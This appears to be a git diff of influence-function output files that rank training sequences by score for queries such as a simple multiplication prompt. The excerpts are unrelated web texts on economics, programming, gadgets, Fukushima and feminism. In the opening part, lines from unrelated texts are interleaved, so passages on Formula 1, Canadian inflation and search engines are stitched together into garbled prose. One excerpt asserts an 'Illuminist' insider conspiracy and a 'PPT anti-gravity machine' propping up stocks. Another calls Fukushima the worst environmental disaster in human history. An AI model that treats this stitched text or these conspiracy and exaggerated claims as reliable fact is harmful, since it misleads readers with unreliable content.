Desjardins, deputy chief economist for RBC. -Engine manufacturers and constructors in bold have competed in the 2018 World Championship. +"We all knew that there was going to be this huge weight on that headline rate because of the energy and now we're seeing some relief from that," Desjardins said. -^ * Built by Cosworth +"It's kind of following the script, if you will, of what forecasters were looking for." -^ ** In 1998 built by Ilmor +To help explain the inflation-cooling effect, some analysts also pointed to the sharp monthly decline in the price of clothing and footwear, which fell 5.2 per cent from November to December. -^ *** Built by Porsche +But moving forward, National Bank senior economist Matthieu Arseneau predicts shoppers will continue to face higher prices for imported goods in many categories. -By driver [ edit ] +"Despite weak energy prices, we don't expect Canadian consumers to get some respite because the dive in the currency should be a significant offset," Arseneau wrote in a note to clients. -Notes: +By region, Statistics Canada found that consumer prices increased in every province last month compared to the year before, with British +================================================================================ +Rank = 98; Score = 299008.0 +<|begin_of_text|>Bob Chapman | October 29, 2008 -* – Posthumously. World Drivers' Champions, since 1958, who never contributed to a Constructors' Championship, were Ferrari's Mike Hawthorn (1958), McLaren's James Hunt (1976), and Williams's Keke Rosberg (1982). Drivers and constructors in bold have competed in the 2018 World Championship. +Down go consumer confidence and real estate values to all-time lows, but, nevertheless, up goes the Dow undaunted, claiming its second largest point gain ever as the counterintuitive insider trading beat goes on and on and on, ad nausea. Insiders get wealthy, and the non-insiders chasing them get annihilated. This has been the story on Wall Street for over a century. Do you think it was merely some sort of serendipitous coincidence that the dark pool of liquidity, known as Project Turquoise, was set to be activated near the end of August, just in time for all the Illuminist insiders to enjoy the profitable fireworks as volatility reached all-time highs, so that all of their nefarious trading could be done in unregulated secrecy? We can assure you that there are no coincidences on Wall Street. There is only rampant, rampaging insider trading and fiendish manipulation. -See also [ edit ] +Any time they think they are in need of a good fleecing, all the poor sheople have to do is get back into the general stock markets where their Illuminist shearers will be more than happy to oblige them. We absolutely guarantee that the pink of your sheople skin will be showing as all your wool is shaved off right down to the hair follicles. You've probably heard about "pink flamingos." Well, now we are going to see a lot of pink sheople wandering around aimlessly, wondering where all their vaporized money went, as they are prepared for the big slaughter while the Big Sting Two goes into its next phase. You need to protect yourself with gold, silver and their now bargain-basement related shares, unless of course the color pink flatters you. -References [ edit ]<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +The Dow, powered by its PPT anti-gravity machine, and in the face of some of the worst economic news of all time, still somehow managed to tack on an unbelievable, mind-blowing and stupefying 889.35 points as the Conference Board Consumer Confidence Index dropped off a cliff from September's 61.4 to October's 38, an all-time low (the "experts" expected 52), as the Standard & Poor's/Case-Shiller 20-city housing index dropped 16.6 percent in August from a year ago, the largest decline on record going back to 2000, and as the smaller, 10-city index, fell 17.7 percent, the biggest decline in its 21 ================================================================================ -Rank = 99; Score = 565248.0 -<|begin_of_text|>Article was originally posted here. - -In this article I want to talk about the Entity-Component-System (ECS). You can find a lot of information about the matter in the internet so I am not going to deep into explanation here, but talking more about my own implementation. +Rank = 99; Score = 299008.0 +<|begin_of_text|>Searching for the next big thing -First things first. You will find the full source code of my ECS in my github repository. +By Jonathan Fildes -An Entity-Component-System – mostly encountered in video games – is a design pattern which allows you great flexibility in designing your overall software architecture[1]. Big companies like Unity, Epic or Crytek in-cooperate this pattern into their frameworks to provide a very rich tool for developers to build their software with. You can checkout these posts to follow a broad discussion about the matter[2,3,4,5]. +Technology reporter, BBC News -If you have read the articles I mentioned above you will notice they all share the same goal: distributing different concerns and tasks between Entities, Components and Systems. These are the three big players in this pattern and are fairly loose coupled. Entities are mainly used to provide a unique identifier, make the environment aware of the existence of a single individual and function as a sort of root object that bundles a set of components. Components are nothing more than container objects that do not possess any complex logic. Ideally they are simple plain old data objects (POD’s). Each type of a component can be attached to an entity to provide some sort of a property. Let’s say for example a “Health-Component” can be attached to an entity to make it mortal by giving it health, which is not more than an integer or floating point value in memory. +Google currently dominates search in most markets The world of search could be facing its biggest shake-up since the arrival of Google. Last week Microsoft launched a bid to take over Yahoo. The software firm offered $44.6bn (£22.3m) for Yahoo, one of the stalwarts of the commercial web since its inception. The two firms have many potential synergies in their services, such as their webmail offerings. But for many observers, a combination of the two companies search offerings could be the most interesting outcome. "The key measure of success in three years time is whether they will have made any progress in fending off - and catching up to - Google," wrote Charlene Li, principle analyst at Forrester Research. According to Nielsen online, Google has a 56% share of the search market in the US, compared to 18% for Yahoo and 14% for Microsoft's Live facility. So even a combined service would still only account for around half of all of the searches done of Google. "The reality is that no one's going to get near Google's search share over the next few years," wrote Nate Elliott, analyst at Jupiter Research. Ad-aware In Europe, the situation is even more acute. According to figures from research firm Comscore, Google has 80-90% of the search share in many European markets. If it goes ahead, the Microsoft and Yahoo merger would be one of the major events in the history of the internet -Up to this point most of the articles I came across agree about the purpose and use of entity and component objects, but for systems opinions differ. Some people suggest that systems are only aware of components. Furthermore some say for each type of component there should be a system, e.g. for “Collision-Components” there is a “Collision-System”, for “Health-Components” there is a “Health-System” etc. This approach is kind of rigid and does not consider the interplay of different components. A less restrictive approach is to let different systems deal with all components they should be concerned with. For instance a “Physics-Systems” should be aware of “Collision-Components” and “Rigidbody-Components”, as both probably contain necessary information regarding physics simulation. In my humble opinion systems are “closed environments”. That is, they do not take ownership of entities nor components. They do access +Alex Burmaster, Nielsen Online "Whether this deal happens or not, it'll be incredibly difficult for anyone to compete with Google for European search share," said Mr Elliott However, he says, a joint offering could compete in other ways. "A combination of MSN and Yahoo would definitely be better-positioned to compete with Google for paid search revenues than each company is now." Many European firms do not bother advertising with anyone but Google because other search engines do not have the reach, he wrote, but a combined offering could change that. "[Microsoft and Yahoo] would still have less than 10% search share in the big European markets...but it would at least give marketers a reason to run trials beyond Google," he wrote. MOST POPULAR SEARCH ENGINES 1. Google Search 2. Yahoo Search 3. Google Image Search 4. MSN/Windows Live Search 5. Ask.com 6. AOL search 7. Google Product Search diff --git a/examples/openwebtext/files/scores_raw/math.txt b/examples/openwebtext/files/scores_raw/math.txt new file mode 100644 index 0000000..5e1b95f --- /dev/null +++ b/examples/openwebtext/files/scores_raw/math.txt @@ -0,0 +1,2430 @@ +Query Sequence: +Prompt:Calculate 15 * 17 =; Completion: 255 + +Top Influential Sequences: +================================================================================ +Rank = 0; Score = 3538944.0 +<|begin_of_text|>Sep 27, 2010 + +As a first step toward a much grander Clojure project I needed a unification library to supplement a simple logic engine (the second step in the larger plan). There are a few options floating around, but nothing that was readily available nor complete. Therefore, I decided to package a simple unification library in hopes that others might find it useful and hopefully eliminate the need to search around fruitlessly like I did. A basic use case for Unifycle is as follows: + +[sourcecode lang=”clojure” gist=”599021″](use ‘[me.fogus.unifycle :only [unifier]]) + +;; unify two expressions with an occurs check + +(unifier ‘((?a *?x ** 2) + (?b *?x) +?c) ‘(?z + (4 * 5) + 3)) + +;=> ((?a * 5 ** 2) + (4 * 5) + 3)[/sourcecode] + +Unifycle exposes a number of canned functions, starting with unifier, try-subst, and garner-unifiers. These functions use an occurs check internally, so use them with that fact in mind. I have also exposed versions of these functions without internal occurs check named unifier-, try-subst-, and garner-unifiers-. If you know what unification is then you know what an occurs check is — if not, then this whole post is probably moot. + +I have also exposed factory functions named make-occurs-unify-fn, make-occurs-subst-fn, make-occurs-unifier-fn, make-unify-fn, make-subst-fn, and make-unifier-fn. The first three create versions using and occurs check and the last three create versions without. Each of these factory functions take a single predicate function that is used to determine if a symbol in a (potentially) unified expression refers to a variable. From the example above, you’ll notice that the default variable function is preceded with a question mark (e.g.?snigglet ). + +I have created a documentation page for Unifycle that I plan to expand. Any and all help is appreciated. + +:f<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 1; Score = 2097152.0 +<|begin_of_text|>“One of the most robust findings in the economics of happiness is that unemployment is highly damaging for people’s wellbeing. We find that this is true around the world.” … “Not only are the unemployed generally unhappier than those in work, but we also find that people generally do not adapt over time to becoming unemployed unlike their responses to many other shocks.” Excerpts from “Happiness at work”, CentrePiece magazine, Autumn 2017, London School of Economics and Political Science “Participating in the satisfying work of innovating enriches lives by endowing them with purpose, dignity, and the sheer joy of making progress in challenging endeavors. Imaginative problem-solving is part of human nature. Participating in it is essential to the good life – and no elite minority should have a monopoly on that.” … “The technologies our species is developing might either hold the keys to unlocking human potential — or to locking it up more tightly than ever.” Excerpts from “Meaningful Work Should Not Be a Privilege of the Elite”, Harvard Business Review, 03 April, 2017 “Viewed narrowly, there seem to be almost as many definitions of intelligence as there were experts asked to define it.” – “Abilities Are Forms of Developing Expertise”, Robert J. Stenberg, Educational Researcher, April, 1998 “One day the AIs are going to look back on us the same way we look at fossil skeletons on the plains of Africa. An upright ape living in dust with crude language and tools, all set for extinction.” – Ex Machina (2014) + +In Matilda, the children’s fantasy movie directed by Danny DeVito and based on Roald Dahl’s book of the same name, the lead character, six-and-a-half year old Matilda, on her first day of school correctly calculates the result of 13 times 379 in her head – much to the amazement of her teacher and classmates. If such an event had taken place in our classrooms, we too would have been astounded and many, if not all, of us would have described young Matilda as being intelligent or even a genius. Yet if we told you that we have a machine that can solve the very same problem in less than a nanosecond, would any of you describe it as being intelligent? We suspect not; although, some may describe the person who designed the machine as being intelligent. + +What then is intelligence? + +We conducted an informal experiment (read: an impromptu poll on Whatsapp +================================================================================ +Rank = 2; Score = 1990656.0 +<|begin_of_text|>Posted May 28, 2015 By Presh Talwalkar. Read about me, or email me. + +What is 7 times 8? I have posted a math trick so you’ll never forget the answer. You can multiply any two numbers from 6 to 10 using your two hands! + +Multiply Numbers Between 6 to 10 On Your Fingers + +There is a mathematical reason why this method is sound. + +Multiply Numbers Between 6 to 10 On Your Fingers – Why It Works + +I recommend watching the videos as the examples illustrate the method very clearly. + +I’ve written up a short summary after the jump. + +Multiply On Your Hands + +Imagine numbering your fingers from 6 to 10, going from your thumb to your pinky finger on each hand. + +Line up your fingers for the two numbers you want to multiply. If you want to multiply 7 by 8, line up your left index finger with your right middle finger. + +Count the two fingers that are touching and the fingers below them. This tells you the tens digit of your answer. + +Then count the fingers above the touching fingers on each left and right hands. Multiply those two numbers. That becomes the units digit of the answer. + +For 7 times 8, you will find 5 fingers are touching and below, and then there will be 3×2 = 6 as the units digit. This gives an answer of 56. + +And this works for any two numbers between 6 and 10! + +Occasionally you will have to carry-over. When you do 6×7, you will find there are 3 fingers touching or below (to make 30), then then you will find there are 4×3 = 12 units. So you need to add up 30 and 12 to get 42. + +I hope you like this trick! For more neat math hacks, check out my YouTube channel.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 3; Score = 1728512.0 +<|begin_of_text|>Here are some facts about this particular date: + +What Day: The 23rd of June, 2005, fell on a Thursday. + +On this exact date: Social news website Reddit is founded. + +Decade: 2000s. + +13 years, 8 months and 5 days have passed since the 23rd of June, 2005. + +Week Number: This date occurred during Week 25 of 2005. + +Day 174 of 2005. + +Leap Year: 2005 was NOT a leap year. + +Zodiac Sign (Astrology): Anyone born on this date will have the star sign Cancer. + +Zodiac Element: Water. + +Chinese Zodiac Animal: In the Chinese Zodiac, 2005 was the year of the Rooster (Yin Water). + +Native American Zodiac: The 23rd of June, 2005 falls under the Woodpecker. + +Birthstone: Anyone born during the month of June will have the birthstones Pearl and Alexandrite. + +Age: Anyone born on the 23rd of June, 2005, will be 13 years of age. + +American Format: 06-23-2005 (the MDY format is also used in Belize). + +YMD Format: 2005-06-23. This format is often used by software applications, simply because numbers such as "20050623" are easier to sort. + +Unix Timestamp: The Unix Timestamp for this date is 1119481200. + +Holidays + +National holidays and famous events that fall on the 23rd of June: + +Saint John's Eve (Denmark) + +Music Singles + +Songs that were on top of the music singles charts in the USA and the United Kingdom on the 23rd of June, 2005: + +United States: We Belong Together - Mariah Carey + +We Belong Together - Mariah Carey United Kingdom: Axel F - Crazy Frog + +Movie Box Office + +What movie was on top of the box office? + +The movie "Mr. & Mrs. Smith" was at the top of the box office on this date. + +News Topics, Fads & Culture + +Trending news stories and fads that were prevalent throughout this time period. These are news stories and events that would have been in the media on the 23rd of June, 2005. + +MySpace Between 2005 and 2008, MySpace was the most popular social network in the world. + +Bebo Throughout 2005, a social network called Bebo was beginning to rise in popularity in countries such +================================================================================ +Rank = 4; Score = 1294336.0 +<|begin_of_text|>Share + +Sonos is wildly popular for a reason. We in the tech biz toss the term “wireless multiroom audio” around a lot, but what Sonos really does is put great-sounding music in every corner of your home or business — and they make it dead simple. We like to think of Sonos as the audio company Apple wishes it could be — one that gives you amazing sound that “just works.” So what could possibly raise our enthusiasm about the company and its wares? We have the answer for you here in our Sonos One review. + +Sonos isn’t alone in this game any longer. Alexa came along and blew the home speaker floodgates wide open. With its open digital assistant platform, Amazon was able not only to popularize its own speaker products, but also to see to it that Alexa started popping up everywhere and controlling everything. Today, if your product doesn’t work with Alexa, it’s considered behind the times. What’s more, Google was prodded to get in on the action and is now pushing its own line of speakers. + +Sonos had to pivot, and pivot it has. In October, Sonos announced the Sonos One, a reimagined version of its popular Play:1 speaker that’s built to be the smartest smart speaker on the market. Out of the box, the Sonos One supports Amazon’s Alexa, but the company promises Google Assistant will come to the One sometime in 2018. Follow below to find out if the company’s latest effort to even further simplify whole-home audio is as successful as it sounds. + +Out of the box + +Dan Baker/Digital Trends + +Sonos long ago perfected its out-of-box experience, drawing inspiration from the folks at Apple and making it all its own. Inside the Sonos Play One box, you’ll find a simple setup card, information on downloading and setting up Amazon’s Alexa app, and a clever sort of “dial” meant to inform and inspire you to tell Alexa how to get music going in your home. + +Setup + +We’ve been praising Sonos for its foolproof setup process, and we’re going to go ahead and keep heaping on the kudos. Figuring out how to seamlessly integrate Amazon’s Alexa assistant and app into its ecosystem is something the company says it pored over for months — and it shows. The process is, like all things Sonos, dead simple. + +We’ve been praising Sonos for its foolproof setup process, and we’re going keep heaping on the +================================================================================ +Rank = 5; Score = 1171456.0 +<|begin_of_text|>Expressions + +x + y + +a - b + +self + +superclass + +_ + +Abstract Syntax Trees (AST) + +1 + 2 + +Compound Expressions + +1 + 2 / 3 * 4 - 5 % 6 + +Operator Precedence + +1 + ((2 / 3) * 4) - ( 5 % 6 ) + +6 - 1 + 5 + +( 6 - 1 ) + 5 + +10 + +6 - (1 + 5) + +0 + +Associativity + +Swift Operators + +Unary Operators + +Prefix Unary Operators + ++ + ++42 + +- + +-1 + +let a = 2 let b = -a // Equals -2 + +! + +true + +false + +let a = true let b = false!a // Equals false!b // Equals true + +~ + +10101010 + +01010101 + +let input = 0b10101010 let output = ~input // equals 0b01010101 + +++ + +var a = 1 b = ++a // 'a' equals 2, 'b' equals 2 + +-- + +var a = 2 var b = --a // 'a' equals 1, 'b' equals 1 + +Postfix Unary Operators + +++ + +var a = 1 b = a++ // 'a' equals 2, 'b' equals 1 + +-- + +var a = 2 b = a-- // 'a' equals 1, 'b' equals 2 + +A Note on the Prefix and Postfix Increment and Decrement Operators + +Binary Operators + +Exponentiative Operators + +<< + +0 + +1 + +2 + +n + +n + +let unsignedBits : UInt8 = 3 // Equals 00000011 in binary unsignedBits << 1 // Equals 00000110 in binary unsignedBits << 5 // Equals 01100000 in binary unsignedBits << 7 // Equals 10000000 in binary let positiveSignedBits : Int8 = 3 // Equals 00000011 in binary let negativeSignedBits : Int8 = -3 // Equals 11111101 in binary positiveSignedBits << 2 // Equals 00001100 in binary negativeSignedBits << 2 // Equals 11110100 in binary + +>> + +0 + +let unsignedBits : UInt8 = 4 // Equals 00000100 in binary let signedBits : Int8 = -4 // Equals 11111100 in binary + +Multiplicative Operators + +* + +let a = 10 let b = 2 a +================================================================================ +Rank = 6; Score = 913408.0 +<|begin_of_text|>1.9k SHARES Share Tweet + +Look at Ms. going full SWERF on us. The hell is this? https://t.co/P7J9NByhI6 — Amadi (@amaditalks) November 4, 2015 + +Like many feminists, my interest in women’s rights began when I started noticing I was treated like I was less than the men around me. I didn’t analyze much deeper than that — I just needed confirmation that something wasn’t right, I wasn’t imagining it, and it wasn’t my fault. Now that my analysis has gone deeper, and is rooted firmly in an anti-oppression framework, it’s clear to me that when I first started learning and believing in feminism I was, in fact, a liberal feminist. + +Liberal feminism provides an individualistic view of women’s rights that holds equality with men as its end goal. Liberal feminism focuses on advancing women’s positions in existing institutions and believes that what women want out of life is what men want and have already secured for themselves. + +Way back then, I understood feminism in relation to my life, my experiences, and my choices. I didn’t spend much time considering how my internalized misogyny shaped those choices — even the choices I now see were problematic because they reinforced mechanisms of women’s oppression. + +For me, then, and for liberal feminists today, the individual is queen. Any choice a woman makes is, by definition, a feminist choice because choosing is a feminist act. Even choices like pandering to the male gaze or self-objectifying must be applauded. As a result, I often engaged in decidedly unfeminist behaviour while uncritically wrapping myself in a comfortingly progressive label. + +Once I began critically examining my beliefs and learning more about the history of feminism, I realized the many ways in which so-called liberal feminism falls short. What soon became clear was that liberal feminism isn’t feminism at all. Uncritically worshipping individual choices ignores the structures and institutions that support patriarchy. Focusing narrowly on advancing in the public sphere ignores the oppression women face in our homes. More worryingly, refusing to examine the context and impacts of our choices allows men and women to continue reinforcing misogyny and male supremacy while patting themselves on the back and failing to work towards liberation for all women in any meaningful way. + +Supporting misogynist ideas, behaviours, and structures while declaring yourself a feminist requires a stunning lack of self-awareness and critical thinking, and an intricate set of unquestioned beliefs whose main purpose is +================================================================================ +Rank = 7; Score = 905216.0 +<|begin_of_text|>+ 14 + +Architects Cox Architecture with Architects 61 + +Location Queen Elizabeth Walk, Esplanade Mall, Singapore + +Category Pedestrian Bridge + +Project Team Philip Cox, Michael Rayner, Hang Chung Ling, Spyros Barberis, Lynn Heng, Michael Ngu, Siti Suriah Taib, Sunita Menon. + +Consultant Team Arup - Structural consultant, Arup - Civil consultant, Arup - Mechanical consultant, Arup - Electrical consultant, Arup - Lighting consultant, Tierra Design - Landscape consultant, Davis Langdon Seah - Cost Consultant. + +Cost At Completion Of Construction SGD$82.900.000 + +Construction Team Sato Kogyo (S) Pte Ltd – Builder + +Area 1379.08 m2 + +Project Year 2010 + +Photographs Christopher Frederick Jones, Angus Martin + +The Helix Bridge provides a pedestrian connection across the head of the Singapore River between the city’s existing CBD and its new Bayfront district. Its commission was the result of a selected 36-entry international design competition held in 2006. + +The plan concept was to curve the bridge in an arc so that it arrives fluidly into foreshore promenades on each side. It also enabled the bridge to connect in its centre to an adjacent vehicular bridge’s footpath while shifting away from it beyond this point of junction. + +Seeking a delicate, lightweight contrast to the vehicular bridge, the concept evolved of a double helix structure. This form enabled the canopy, required by the brief, to be integrated as segmented panels of glass and perforated steel, unlike other bridge structures. The structural typology also proved highly effective in working to a curvilinear plan, and in generating an intriguing sense of movement flow along the journey. + +The Helix Bridge is illuminated at night by ribbons of LED lighting accentuating the interplay of the two helix tubes and their intervening, connecting ties. Four ovular-shaped ‘pods’ cantilever out from the structure enabling people to gain wider appreciation of the bridge form and providing gathering space for viewing bay events. Conceptual Framework The design of The Helix Bridge responds to the brief of an international architectural competition calling for a unique structural form that could be symbolic of Singapore’s goal of promoting the identity of Asia’s ‘connected city’. The plan concept was to curve the bridge away from an adjoining linear vehicular bridge, such that it touched at a point for pedestrian interconnection, yet descended in each direction to fluidly continue along existing prom +================================================================================ +Rank = 8; Score = 880640.0 +<|begin_of_text|>Can you solve these puzzles about differentiation and integration? + +Click to share on Reddit (Opens in new window) + +Click to share on Facebook (Opens in new window) + +Click to share on Twitter (Opens in new window) + +Privacy & Cookies: This site uses cookies. By continuing to use this website, you agree to their use. + +To find out more, including how to control cookies, see here: Privacy & Cookies: This site uses cookies. By continuing to use this website, you agree to their use.To find out more, including how to control cookies, see here: Cookie Policy + +When learning A-level maths, much time is devoted to learning how to differentiate and integrate. For this week’s blog post, I have collected some puzzles based on these skills. They should be fun to solve, present a few surprises and maybe even provide a teacher or two with an extra challenge for capable students. + +The answers to these puzzles will appear here from Sunday at 8am. + +Let’s start with an integral: + +An Integral Source: mscroggs.co.uk + +What is + +$$\int_0^{\frac\pi2}\frac1{1+\tan^ax}\,dx?$$ + +This might look difficult to you. You might first start by substituting in some specific values for $a$, and this would be a good way to start, but solving the integral in general is difficult. However, considering the second integral $$\int_0^{\frac\pi2}\frac1{1+\cot^ax}\,dx$$ along with the integral in the question should help. + +Before I say too much, I’m going to stop and leave any further discussion of this puzzle for the answers [available from Sunday 8am]. + +Next, let’s have a go at a few derivatives: + +$x$ to the power of $x$ to the power of $x$ to the power of … Source: mscroggs.co.uk + +Let $\displaystyle y=x^{x^{x^{x^{.^{.^.}}}}}$ (with an infinite chain of powers of $x$).What is $\displaystyle \frac{dy}{dx}$? + +Differentiate this Source: Alex Bolton + +Let $\displaystyle a=\frac{\ln(\ln x)}{\ln x}$. Let $b=x^a$. Let $\displaystyle y=e^b$. What is $\displaystyle \frac{dy}{dx}$? + +Finally, the last puzzle of this blog post asks you to find all functions whose integr +================================================================================ +Rank = 9; Score = 864256.0 +<|begin_of_text|>2.6k SHARES Share Tweet + +Six years ago, an absolutely devastating tsunami caused a triple meltdown at Japan’s Fukushima nuclear power facility. It was the worst environmental disaster in all of human history, and even though six years have passed since that time, nobody knows where the three melted cores are. Just recently, authorities believe that they spotted some melted fuel underneath reactor 2, but even from a distance the level of nuclear radiation that was detected was being described as “unimaginable”. Essentially what we are talking about are three enormous “dirty bombs” that are continuously emitting tremendous amounts of nuclear radiation into the air, water and soil. Some of the radioactive elements that are being released have half-lives that are measured in tens of thousands of years, and so the poisonous effect of these “dirty bombs” could potentially be with us for generation after generation. + +Personally, I don’t know why the big mainstream news outlets in the U.S. are almost entirely ignoring Fukushima these days. Fox News did a story on the “unimaginable” radiation at Fukushima just a few days ago, but that was about it. + +To me, it is certainly newsworthy that nuclear radiation inside reactor 2 at Fukushima is at the highest level ever recorded… + +Radiation levels inside a damaged reactor at Japan’s Fukushima nuclear plant have hit a record high, and are the worst since the plant suffered a triple meltdown nearly six years ago. The latest readings now pose a serious challenge as officials prepare to dismantle the stricken facility. Radiation levels inside the containment vessel of reactor No. 2 at Fukushima has reached 530 sieverts per hour—a figure described by experts as “unimaginable.” + +Previously, the highest level of radiation measured at Fukushima was 73 sieverts per hour, and just a small fraction of that amount would be fatal to most humans… + +Needless to say, this plant is not fit for human life. Just one dose of a single sievert is enough to cause radiation sickness and nausea. Exposure to four to five sieverts would kill about half of those exposed to it within a month, while a single dose of 10 sieverts is enough to kill a person within weeks. + +At 530 sieverts per hour, the radiation is so intense that even robots can only last for a couple of hours in that environment. The Japanese hope to eventually remove the melted fuel from these reactors someday, but first they have to figure out if it is even possible. + +And the truth is that the level of radiation in reactor 2 may actually be far higher +================================================================================ +Rank = 10; Score = 835584.0 +<|begin_of_text|>942 > 353 + +A lot greater. To have just a break-even chance of meeting that 1.5 degree goal we solemnly set in Paris, we’ll need to close all of the coal mines and some of the oil and gas fields we’re currently operating long before they’re exhausted. + +“Absent some incredible breakthrough in mythical carbon-sucking unicorns, the numbers say we’re done with the expansion of the fossil fuel industry,” says Kretzmann. “Living up to the Paris Agreement means we must start a managed decline in the fossil fuel industry immediately—and manage that decline as quickly as possible.” + +“Managed decline” means we don’t have to grind everything to a halt tomorrow; we can keep extracting fuel from existing oil wells and gas fields and coal mines. But we can’t go explore for new ones. We can’t even develop the ones we already know about, the ones right next to our current projects. + +In the United States alone, the existing mines and oil wells and gas fields contain 86 billion tons of carbon emissions—enough to take us 25 percent of the way to a 1.5 degree rise in global temperature. But if the U.S. energy industry gets its way and develops all the oil wells and fracking sites that are currently planned, that would add another 51 billion tons in carbon emissions. And if we let that happen, America would single-handedly blow almost 40 percent of the world’s carbon budget. + +This new math is bad news for lots of powerful players. The fossil fuel industry has based its entire business model on the idea that it can endlessly “replenish” the oil and gas it pumps each year; its teams of geologists are constantly searching for new fields to drill. In September, Apache Corporation announced that it has identified fields in West Texas that hold three billion barrels of oil. Leaving that oil underground—which the new math shows we must do if we want to meet the climate targets set in Paris—would cost the industry tens of billions of dollars. + +For understandable reasons, the unions whose workers build pipelines and drill wells also resist attempts to change. Consider the current drama over the Dakota Access oil pipeline. In September, even after pipeline security guards armed with pepper spray and guard dogs attacked Native Americans who were nonviolently defending grave sites from bulldozers, AFL-CIO President Richard Trumka called on the Obama administration to allow construction to proceed. “Pipeline construction and maintenance,” Trumka said, “provides quality jobs to tens of thousands of skilled workers +================================================================================ +Rank = 11; Score = 790528.0 +<|begin_of_text|>Share + +There was a time when manual transmissions were synonymous with performance cars, but that time is past. + +Ferrari is the latest automaker to retire the clutch pedal, a move that will probably seem like a gut punch to fans of stick shifts, but isn’t too surprising given the low sales of manuals in Ferraris and other high-end performance cars over the past few years. And that’s not even the primary reason why Ferrari is ditching manuals. + +“Ferrari is design, performance, and state-of-the-art technologies. There’s no manual transmission that can beat this performance and therefore we have decided to stay on the double-clutch gearbox,” Michael Hugo Leiters, the automaker’s chief technology officer, said in an interview with Motor Authority at the recent 2016 Paris Motor Show. Even a well-shifted manual can’t match the speed of modern dual-clutch transmissions, after all. + +Read more: 2016 Ferrari 488 GTB first drive + +That argument is a compelling one for manufacturers constantly looking to increase the performance of their cars, both to win over consumers and to achieve bragging rights. For decades, manual transmissions had a performance advantage over those without clutch pedals, but today’s dual-clutch transmissions have erased that advantage. They shift faster, and they help carmakers snag customers that might have been discouraged by having to master a manual. + +Ferrari isn’t alone in leaving the manual transmission behind. Lamborghini and McLaren don’t have a single manual between them, and Porsche has made the dual-clutch PDK transmission mandatory on the highest-performance versions of its 911. Porsche still offers manuals on lower-level models, though, and Aston Martin still offers them throughout its range. + +Manuals are also much easier to find on less-expensive cars. Once you leave the six-figure realm, they start to become more common on performance cars. The manual transmission is definitely on the endangered species list, but it’s not extinct … yet.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|